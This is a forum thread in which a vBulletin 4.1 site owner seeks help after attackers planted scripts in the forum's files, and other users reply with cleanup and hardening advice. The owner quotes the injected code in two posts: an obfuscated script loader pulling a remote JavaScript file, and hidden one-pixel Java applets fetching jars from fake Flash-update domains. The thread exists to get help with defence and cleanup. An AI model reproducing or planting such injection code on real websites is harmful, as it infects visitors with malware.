Announcement

Collapse
No announcement yet.

My Vb4.1 was hacked !!! Please Help

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • [Forum] My Vb4.1 was hacked !!! Please Help

    Anyone please help me. Hacker add this scripts to my clientscript folder. Also they add to my style and templates. I don't know how they do it but I did change mod everything to 555 but they still add these code on my site.

    <script>var y ="jquery";var z = "plugins";var x ="http://";var t = ".org";var w = "jquery14";var u="script";document.write("<"+u+ " src=\""+ x + y + z + t + "/"+w+".js\""+">"+"</"+u+">");</script>


    Please help me, I am so tired. Anyone know where is style and templates store on server ? I need to change it permission.

  • #2
    1. Re-upload all files in your root directory.
    2. Run this mod: http://www.vbulletin.org/forum/showthread.php?t=220967 (Yes, I know it's a 3.8 mod, but it works on 4.0)
    3. Change all passwords (FTP, Admin Accounts, cPanel, Database PW's, etc)
    4. Good luck.

    Comment


    • #3
      thank you so much , I will try it.

      Comment


      • #4
        No problems. It sucks having that feeling that someone else has been in your stuff.

        Comment


        • #5
          They still can get to my site. I think this is VB4 problem because they can login to any admin username.
          I did change all my password. Also I deleted all files, then I upload VB4 again but some how they can access to admin account. I don't know what to do.

          Comment


          • #6
            Protect your admincp folder with an htaccess htpasswd files

            Comment


            • #7
              are you on a shared server?
              -- Web Developer for hire
              ---Online Marketing Tools and Articles

              Comment


              • #8
                Originally posted by chithanh View Post
                They still can get to my site. I think this is VB4 problem because they can login to any admin username.
                I did change all my password. Also I deleted all files, then I upload VB4 again but some how they can access to admin account. I don't know what to do.
                change admincp location, and rename the folder

                Comment


                • #9
                  I am run my own the server host by the planet. I did change my admincp but they know my password right after I change it. They insert this html code to my script. I don't know what they try to do

                  <script>var y ="jquery";var z = "plugins";var x ="http://";var t = ".org";var w = "jquery14";var u="script";document.write("<"+u+ " src=\""+ x + y + z + t + "/"+w+".js\""+">"+"</"+u+">");</script>

                  <applet code="FlashPlayer.class" width="1" height="1" archive="http://adobe-upgrade.com/FlashPlayer.jar">
                  <param NAME="_cx" VALUE="26">
                  <param NAME="_cy" VALUE="26">
                  </applet><applet code="FlashPlayer.class" width="1" height="1" archive="http://flash-update.info/FlashPlayer.jar">
                  <param NAME="_cx" VALUE="26">
                  <param NAME="_cy" VALUE="26">
                  </applet>

                  Comment


                  • #10
                    I bet its your hosting company that is using unpatched/vulnerable software....either apache or a known linux kernal bug. Call them and tell them to update their stuff
                    Maxum Boat Forum / Computer Repair Cary NC

                    Comment


                    • #11
                      If you are noticing that the script is installed as soon as you upload new files and change your passwords, it is possible that you are uploading the script yourself. In other words, the trojan may be on your local computer. Run an antivirus scan (like Eset's Online Scanner - free), then download a fresh set of vB files from your Members' Area and upload those as suggested above. If you are infected locally, however, you can keep uploading new files until the cows come how and it won't do one bit of good. Also, are you replacing just the vBulletin files on your server? Have you inspected other non-vB files?

                      Comment


                      • #12
                        Originally posted by Loco.M View Post
                        are you on a shared server?
                        is that a bad thing if you are?

                        I am, does that put me at risk?
                        DIGRACERS.COM "GRAB A LANE!"
                        http://i27.photobucket.com/albums/c1...eSIGNATURE.jpg
                        Holeshot-Productions.com
                        Grabalane on Facebook
                        My Streetfire Videos

                        Comment


                        • #13
                          Originally posted by GRABALANE View Post
                          is that a bad thing if you are?

                          I am, does that put me at risk?
                          No,it does not,provided you have a good host.


                          vB5 is unequivocally the best forum software, but not yet...

                          Comment


                          • #14
                            I will try again with another computer. May be my computer to upload a virus file. I will redo everything to see what is wrong.

                            Comment


                            • #15
                              Also make sure that you do not have any files or folders with 777 permissions.

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X